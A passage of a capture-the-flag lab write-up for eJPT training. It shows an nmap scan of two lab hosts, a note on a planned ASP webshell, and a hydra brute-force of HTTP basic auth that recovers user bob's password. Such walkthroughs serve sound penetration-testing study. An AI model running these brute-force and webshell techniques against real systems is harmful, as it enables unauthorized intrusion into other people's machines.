Welcome to the first System-Host Based Attacks CTF 1 lab writeup for the eJPT. Let’s get started!
Attacking IP: 10.10.48.2
Target IPs: target1.ine.local - 10.3.16.216
target2.ine.local - 10.3.18.42
Below are wordlists recommended by the lab we use for our tasks.
/usr/share/metasploit-framework/data/wordlists/common_users.txt,
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt,
/usr/share/webshells/asp/webshell.asp
Let’s run our nmap scan and start our enumeration. After running our nmap scan below we can see there’s a few open port for this target. Related to the first task I’m willing to bet that the user bob is associated with one of these open services. Let’s check out the web service on port 80 and see if we can find a login portal.
nmap -sV -sC 10.3.16.216
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2026-01-10 03:22 IST
Nmap scan report for target1.ine.local (10.3.16.216)
Host is up (0.0027s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\\x0D
|_ Basic realm=target1.ine.local
|_http-title: 401 - Unauthorized: Access is denied due to invalid credentials.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-09T21:52:17+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=EC2AMAZ-JVD17HK
| Not valid before: 2026-01-08T21:44:55
|_Not valid after: 2026-07-10T21:44:55
| rdp-ntlm-info:
| Target_Name: EC2AMAZ-JVD17HK
| NetBIOS_Domain_Name: EC2AMAZ-JVD17HK
| NetBIOS_Computer_Name: EC2AMAZ-JVD17HK
| DNS_Domain_Name: EC2AMAZ-JVD17HK
| DNS_Computer_Name: EC2AMAZ-JVD17HK
| Product_Version: 10.0.17763
|_ System_Time: 2026-01-09T21:52:09+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-01-09T21:52:10
|_ start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Sure enough if we go to the target1.ine.local URL we find a login portal that will probably accept our username. We can use hydra to brute force a password I bet. Something else to note here when we see a Microsoft IIS service running on port 80 is to consider what could be happening here. There could be a webdav, a web portal, default directories, or other possibilities. In this labs case it’s going to be a webdav but we need to test that to be sure.
Important Note: It’s easy to follow walkthroughs like this when most of the time we’re being guided down the only solution that will work and not seeing all the failed options tried by the user practicing the lab so keep this awareness in mind as you build your skills. Try to give your brain a fair chance at recalling what you’ve studied already to try and build that muscle memory. That will help you become a stronger hacker.
hydra -l bob -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target1.ine.local http-get
[80][http-get] host: target1.ine.local login: bob password: password_123321